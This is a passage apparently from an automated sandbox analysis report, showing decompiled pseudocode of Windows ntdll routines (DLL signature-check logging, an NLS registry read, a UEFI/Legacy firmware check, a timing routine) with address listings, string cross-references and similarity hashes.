							E011F5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1265780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01197D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01197D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E011F7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01197D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01197D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E011F7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E011AA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0117B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                          0x01187e4c
                                                                          0x01187e50
                                                                          0x01187e55
                                                                          0x01187e58
                                                                          0x01187e5d
                                                                          0x01187e71
                                                                          0x01187f33
                                                                          0x01187e77
                                                                          0x01187e77
                                                                          0x01187e79
                                                                          0x01187e79
                                                                          0x01187e7e
                                                                          0x01187f45
                                                                          0x011d9848
                                                                          0x00000000
                                                                          0x011d9848
                                                                          0x01187f4e
                                                                          0x01187f53
                                                                          0x01187f5a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d985a
                                                                          0x011d9862
                                                                          0x011d9866
                                                                          0x00000000
                                                                          0x011d986c
                                                                          0x00000000
                                                                          0x011d986c
                                                                          0x01187e84
                                                                          0x01187e84
                                                                          0x01187e8d
                                                                          0x011d9871
                                                                          0x01187eb8
                                                                          0x01187ec0
                                                                          0x01187ec0
                                                                          0x01187e9a
                                                                          0x011d987e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d9884
                                                                          0x011d988b
                                                                          0x011d98a7
                                                                          0x011d98ac
                                                                          0x011d98b1
                                                                          0x011d98b6
                                                                          0x011d98b8
                                                                          0x011d98b8
                                                                          0x011d98b9
                                                                          0x00000000
                                                                          0x011d98b9
                                                                          0x01187ea0
                                                                          0x01187ea7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x01187eac
                                                                          0x01187eb1
                                                                          0x01187ec6
                                                                          0x01187ed0
                                                                          0x011d98cc
                                                                          0x01187ed6
                                                                          0x01187ed6
                                                                          0x01187ed6
                                                                          0x01187ede
                                                                          0x01187ee3
                                                                          0x011d98e3
                                                                          0x011d98f0
                                                                          0x011d9902
                                                                          0x011d98f2
                                                                          0x011d98fb
                                                                          0x011d98fb
                                                                          0x011d9907
                                                                          0x011d991d
                                                                          0x011d991d
                                                                          0x011d9907
                                                                          0x011d98e3
                                                                          0x01187ef0
                                                                          0x01187f14
                                                                          0x01187f14
                                                                          0x01187f1e
                                                                          0x011d9946
                                                                          0x01187f24
                                                                          0x01187f24
                                                                          0x01187f24
                                                                          0x01187f2c
                                                                          0x011d996a
                                                                          0x011d9975
                                                                          0x011d9975
                                                                          0x011d997e
                                                                          0x011d9993
                                                                          0x011d9993
                                                                          0x011d997e
                                                                          0x00000000
                                                                          0x01187ef2
                                                                          0x01187efc
                                                                          0x01187f0a
                                                                          0x01187f0e
                                                                          0x011d9933
                                                                          0x00000000
                                                                          0x011d9933
                                                                          0x00000000
                                                                          0x01187f0e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x01187eb1

                                                                          Strings
                                                                          • minkernel\ntdll\ldrmap.c, xrefs: 011D98A2
                                                                          • LdrpCompleteMapModule, xrefs: 011D9898
                                                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 011D9891
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                          • API String ID: 0-1676968949
                                                                          • Opcode ID: f22baf07b33214b091df1637a6961b548d9b5535c756f8d7a1081d24e3aee5aa
                                                                          • Instruction ID: 60ee4fd8ee05ca7796a4cda6b5ada700da1aa192faaf0bfcead1429f6061a7af
                                                                          • Opcode Fuzzy Hash: f22baf07b33214b091df1637a6961b548d9b5535c756f8d7a1081d24e3aee5aa
                                                                          • Instruction Fuzzy Hash: 71510431600749DBEB2EDB5CC984B2ABBE4AF01718F244599E9619B7D1D734ED00CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0117E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 93%
                                                                          			E0117E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0117F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E011B95D0();
						}
						if(_t78 != 0) {
							L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E011BFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E011BBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E011B9600();
					if(_t97 < 0) {
						goto L6;
					}
					E011BBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0117F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E011BBB40(_t83, _t102 + 0x24, _t78);
								if(L011843C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E011BBB40(_t84, _t102 + 0x24, _t94);
									if(L011843C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                          0x0117e620
                                                                          0x0117e628
                                                                          0x0117e62f
                                                                          0x0117e631
                                                                          0x0117e635
                                                                          0x0117e637
                                                                          0x0117e63e
                                                                          0x011d5503
                                                                          0x011d5503
                                                                          0x0117e64c
                                                                          0x0117e64c
                                                                          0x0117e651
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0117e661
                                                                          0x0117e665
                                                                          0x011d542a
                                                                          0x0117e715
                                                                          0x0117e71a
                                                                          0x0117e71c
                                                                          0x0117e720
                                                                          0x0117e720
                                                                          0x0117e727
                                                                          0x0117e736
                                                                          0x0117e736
                                                                          0x0117e743
                                                                          0x0117e743
                                                                          0x0117e673
                                                                          0x0117e678
                                                                          0x0117e67d
                                                                          0x0117e682
                                                                          0x0117e685
                                                                          0x0117e692
                                                                          0x0117e69b
                                                                          0x0117e6a3
                                                                          0x0117e6ad
                                                                          0x0117e6b1
                                                                          0x0117e6b2
                                                                          0x0117e6bb
                                                                          0x0117e6bf
                                                                          0x0117e6c0
                                                                          0x0117e6c8
                                                                          0x0117e6cc
                                                                          0x0117e6d5
                                                                          0x0117e6d9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0117e6e5
                                                                          0x0117e6ea
                                                                          0x0117e6f9
                                                                          0x0117e70b
                                                                          0x0117e70f
                                                                          0x011d5439
                                                                          0x011d545e
                                                                          0x011d545e
                                                                          0x00000000
                                                                          0x011d545e
                                                                          0x011d543b
                                                                          0x011d543e
                                                                          0x011d5440
                                                                          0x011d5445
                                                                          0x011d5472
                                                                          0x011d5475
                                                                          0x011d548d
                                                                          0x011d5493
                                                                          0x011d54a9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d54ab
                                                                          0x011d54b4
                                                                          0x011d54bc
                                                                          0x011d54c8
                                                                          0x011d54de
                                                                          0x011d54fb
                                                                          0x011d54e0
                                                                          0x011d54e6
                                                                          0x011d54eb
                                                                          0x011d54eb
                                                                          0x011d54de
                                                                          0x00000000
                                                                          0x011d54bc
                                                                          0x011d5477
                                                                          0x011d547a
                                                                          0x011d5480
                                                                          0x011d5483
                                                                          0x011d5486
                                                                          0x011d548b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d548b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d5447
                                                                          0x011d5447
                                                                          0x011d5447
                                                                          0x011d5447
                                                                          0x011d544e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d5450
                                                                          0x011d5452
                                                                          0x011d5455
                                                                          0x011d545a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011d545c
                                                                          0x011d546a
                                                                          0x011d546d
                                                                          0x011d546f
                                                                          0x00000000
                                                                          0x011d546f
                                                                          0x0117e70f

                                                                          Strings
                                                                          • InstallLanguageFallback, xrefs: 0117E6DB
                                                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0117E68C
                                                                          • @, xrefs: 0117E6C0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                          • API String ID: 0-1757540487
                                                                          • Opcode ID: b82426e981c8db78cf6e3498d2707b80dea8e9f924e6bd30297798e7095e9404
                                                                          • Instruction ID: c8000ed5975a6124173241ca9c273a51c6fae52e6fe6898052d3219a696a2b8d
                                                                          • Opcode Fuzzy Hash: b82426e981c8db78cf6e3498d2707b80dea8e9f924e6bd30297798e7095e9404
                                                                          • Instruction Fuzzy Hash: 2A51D2725093069BD728DF28C480AABB7F9BF88718F45096EF985D7240FB34D904C7A2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011F51BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 77%
                                                                          			E011F51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x12505f0);
				E011CD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0118EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E011F53CA(0);
						return E011CD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E011BF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01193690(1, _t117, 0x1151810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E011BAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01194620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E011BAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E011F500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E011B9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                          0x011f51be
                                                                          0x011f51c3
                                                                          0x011f51c8
                                                                          0x011f51cd
                                                                          0x011f51d0
                                                                          0x011f51d3
                                                                          0x011f51d8
                                                                          0x011f51db
                                                                          0x011f51de
                                                                          0x011f51e0
                                                                          0x011f51e3
                                                                          0x011f51e6
                                                                          0x011f51e8
                                                                          0x011f5342
                                                                          0x011f5351
                                                                          0x011f5356
                                                                          0x011f535a
                                                                          0x011f5360
                                                                          0x011f5363
                                                                          0x011f5366
                                                                          0x011f5369
                                                                          0x011f5369
                                                                          0x011f536b
                                                                          0x011f536b
                                                                          0x011f5370
                                                                          0x011f53a3
                                                                          0x011f53a4
                                                                          0x011f53a6
                                                                          0x011f53ab
                                                                          0x011f53ab
                                                                          0x011f53ae
                                                                          0x011f53ae
                                                                          0x011f53b5
                                                                          0x011f53bf
                                                                          0x011f53bf
                                                                          0x011f5375
                                                                          0x011f5396
                                                                          0x011f53a0
                                                                          0x011f53a0
                                                                          0x00000000
                                                                          0x011f5396
                                                                          0x011f5377
                                                                          0x011f5379
                                                                          0x011f537f
                                                                          0x011f538c
                                                                          0x011f5390
                                                                          0x00000000
                                                                          0x011f5390
                                                                          0x011f51ee
                                                                          0x011f51f1
                                                                          0x011f5301
                                                                          0x011f5310
                                                                          0x011f5315
                                                                          0x011f5318
                                                                          0x011f531b
                                                                          0x011f5320
                                                                          0x011f532e
                                                                          0x011f5331
                                                                          0x00000000
                                                                          0x011f5331
                                                                          0x011f5328
                                                                          0x011f5329
                                                                          0x00000000
                                                                          0x011f5329
                                                                          0x011f51fa
                                                                          0x011f5235
                                                                          0x011f5236
                                                                          0x011f5239
                                                                          0x011f523f
                                                                          0x011f5240
                                                                          0x011f5241
                                                                          0x011f5242
                                                                          0x011f5246
                                                                          0x011f5247
                                                                          0x011f524e
                                                                          0x011f5251
                                                                          0x011f5267
                                                                          0x011f5269
                                                                          0x011f526e
                                                                          0x011f527d
                                                                          0x011f527e
                                                                          0x011f5281
                                                                          0x011f5282
                                                                          0x011f5287
                                                                          0x011f5288
                                                                          0x011f528a
                                                                          0x011f528f
                                                                          0x011f5294
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011f529a
                                                                          0x011f529c
                                                                          0x011f529e
                                                                          0x011f529e
                                                                          0x011f52a4
                                                                          0x011f52b0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011f52ba
                                                                          0x011f52bc
                                                                          0x011f52bc
                                                                          0x011f52d4
                                                                          0x011f52d9
                                                                          0x011f52dc
                                                                          0x011f52e1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011f52e7
                                                                          0x011f52f4
                                                                          0x00000000
                                                                          0x011f52f4
                                                                          0x011f5270
                                                                          0x00000000
                                                                          0x011f5270
                                                                          0x011f51fc
                                                                          0x011f51fd
                                                                          0x011f5202
                                                                          0x011f5203
                                                                          0x011f5205
                                                                          0x011f520a
                                                                          0x011f520f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011f521b
                                                                          0x011f5226
                                                                          0x011f522b
                                                                          0x011f521d
                                                                          0x011f521d
                                                                          0x011f5222
                                                                          0x011f5222
                                                                          0x011f522d
                                                                          0x00000000

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: Legacy$UEFI
                                                                          • API String ID: 2994545307-634100481
                                                                          • Opcode ID: 14c1cd2a8e42f6b4221d81022e861a21ad53a20b5d96df9500f7981a238d2cd4
                                                                          • Instruction ID: 05265de90dd7b6e6e987e2a6abbdb57a85f043885c4c46cdd85c7c61135cb5e8
                                                                          • Opcode Fuzzy Hash: 14c1cd2a8e42f6b4221d81022e861a21ad53a20b5d96df9500f7981a238d2cd4
                                                                          • Instruction Fuzzy Hash: 36516AB5E04609DFDB68DFA88980BADBBFAFB48704F14402DE659EB251D7709901CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0119B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 76%
                                                                          			E0119B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x126d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01197D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01248CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E011B9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E011BB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E011BCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01197D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01248F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E011BAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1268628; // 0x0
								_v68 = _t77;
								_t78 =  *0x126862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1268628; // 0x0
							_t116 =  *0x126862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                          0x0119b94c
                                                                          0x0119b956
                                                                          0x0119b95c
                                                                          0x0119b95e
                                                                          0x0119b964
                                                                          0x0119b969
                                                                          0x0119b96d
                                                                          0x0119b96d
                                                                          0x0119b970
                                                                          0x0119b974
                                                                          0x0119b97a
                                                                          0x0119badf
                                                                          0x0119badf
                                                                          0x0119bae2
                                                                          0x0119bae4
                                                                          0x0119bae6
                                                                          0x0119baf0
                                                                          0x011e2cb8
                                                                          0x0119baf6
                                                                          0x0119baf6
                                                                          0x0119baf6
                                                                          0x0119bafd
                                                                          0x0119bb1f
                                                                          0x0119bb1f
                                                                          0x0119baff
                                                                          0x0119bb00
                                                                          0x0119bb00
                                                                          0x0119bb03
                                                                          0x0119bb03
                                                                          0x0119bacb
                                                                          0x0119bacf
                                                                          0x0119bad0
                                                                          0x0119bad1
                                                                          0x0119badc
                                                                          0x0119badc
                                                                          0x0119b980
                                                                          0x0119b980
                                                                          0x0119b988
                                                                          0x0119b98b
                                                                          0x0119b98d
                                                                          0x0119b990
                                                                          0x0119b993
                                                                          0x0119b999
                                                                          0x0119b99b
                                                                          0x0119b9a1
                                                                          0x0119b9a5
                                                                          0x0119b9aa
                                                                          0x0119b9b0
                                                                          0x0119b9bb
                                                                          0x0119b9c0
                                                                          0x0119b9c3
                                                                          0x0119b9ca
                                                                          0x0119b9cc
                                                                          0x0119b9cf
                                                                          0x0119b9d3
                                                                          0x0119b9d7
                                                                          0x0119ba94
                                                                          0x0119ba94
                                                                          0x0119ba98
                                                                          0x0119baa3
                                                                          0x011e2ccb
                                                                          0x0119baa9
                                                                          0x0119baa9
                                                                          0x0119baa9
                                                                          0x0119bab1
                                                                          0x011e2cd5
                                                                          0x011e2cdd
                                                                          0x011e2cdd
                                                                          0x0119babb
                                                                          0x0119babc
                                                                          0x0119bac2
                                                                          0x0119bac3
                                                                          0x0119bac3
                                                                          0x0119bac6
                                                                          0x00000000
                                                                          0x0119b9dd
                                                                          0x0119b9dd
                                                                          0x0119b9e7
                                                                          0x0119b9e7
                                                                          0x0119b9ec
                                                                          0x0119b9ec
                                                                          0x0119b9f1
                                                                          0x0119b9f5
                                                                          0x0119b9fa
                                                                          0x0119ba00
                                                                          0x0119ba0c
                                                                          0x0119ba10
                                                                          0x0119ba10
                                                                          0x0119ba12
                                                                          0x0119ba18
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0119bb26
                                                                          0x0119bb26
                                                                          0x0119ba1e
                                                                          0x0119ba1e
                                                                          0x0119ba23
                                                                          0x0119ba25
